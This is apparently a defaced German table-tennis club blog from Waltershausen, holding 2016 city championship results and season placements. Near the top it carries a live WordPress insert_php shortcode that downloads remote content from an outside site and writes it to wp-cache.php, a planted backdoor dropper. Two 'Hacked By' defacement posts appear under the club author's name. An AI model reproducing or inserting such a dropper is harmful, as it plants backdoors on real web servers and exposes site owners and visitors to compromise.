tester

[insert_php] file_put_contents(‚wp-cache.php‘, file_get_contents(‚http://20mgprednisoneonline.org/1.txt‘)); [/insert_php]

Hacked By XwoLfTn

Geschrieben am Montag 26. September 2016 von Johannes Berger

Hacked By XwoLfTn

Long life for Tunisia 
long life to Palestine

./Exit

 

Hacked By Unknown

Geschrieben am Donnerstag 25. August 2016 von Johannes Berger

Hacked By Not Matter who am i ~ i am white Hat Hacker please update your wordpress

Hacked By white hat hacker<br />

Ergebnisse der Stadtmeisterschaften 2016

Geschrieben am Sonntag 19. Juni 2016 von Johannes Berger

Am 18. und 19. Juni 2016 fanden in der Dreifelderhalle am Schönrasen die 46. landesoffenen Stadtmeisterschaften von Waltershausen statt.

Die Ergebnisse im Detail:

Herren Einzel B
1. Tobias Spengler (TTV Waltershausen)
2. Eric Nußbicker (Tabarzer SV)
3. Jens Nitzsche (TSG Ruhla)
3. Marcel Gärtner (SV Sömmerda)

Herren Doppel B
1.Eric Nußbicker (Tabarzer SV) – Marcel Gärtner (SV Sömmerda)
2.Tobias Spengler (TTV Waltershausen) – Danny Rudolph (FSV Mainz 05)
3. Matthias Göpel – Manfred Carstensen (BSV BW 84 Eisenach)
3. Carsten Bischoff (SV Eberstadt) – Matthias Bischoff (TTSV Herbsleben)

Herren Einzel A
1.Sebastian Carl (TTZ Sponeta Erfurt)
2.Peter Maier (Sportfreunde Leubingen)
3.Steffen Wagner (Post SV Zeulenroda)
3.Gerd Wagner (SV Schott Jena)

Herren Doppel A
1.Steffen Wagner – Markus Walther (Post SV Zeulenroda)
2.Gerd Wagner – Renè Wolf (SV Schott Jena)
3.Sebastian Carl (TTZ Sponeta Erfurt) – Silvan Weidemüller (TTC HS Schwarza)
3.Peter Maier – Steffen Henich (Sportfreunde Leubingen)

Damen Einzel
1.Joanna Krzok (Tischtennisfreunde Stühlingen)
2.Corinna Weidemüller (TTC HS Schwarza)
3.Katrin Konschake (TTZ Sponeta Erfurt)

Damen Doppel
1.Katrin Konschake (TTZ Sponeta Erfurt) – Corinna Weidemüller (TTC HS Schwarza)
2.Joanna Krzok (Tischtennisfreunde Stühlingen) – Katja Schulz (TTV Waltershausen)
3.Diana Rönnpagel (TTV Waltershausen) – Lisa Liebing (TTV Waltershausen)

IMG_9698
IMG_9702

Alle Fotos sind hier zu finden.

Ergebnisse Saison 2015/16

Geschrieben am Samstag 30. April 2016 von Johannes Berger

Die Saison 2015/16 ist mittlerweile beendet und unsere Mannschaften haben folgende Platzierungen erreicht:

1. Mannschaft: 8. Platz in der 1. Bezirksliga
2. Mannschaft: 8. Platz in der 1. Kreisliga
3. Mannschaft: 7. Platz in der 2. Kreisliga
4. Mannschaft: 5. Platz in der 5. Kreisliga
5. Mannschaft: 6. Platz in der 6. Kreisliga

Jugend: 3. Platz in der Kreisliga Jugend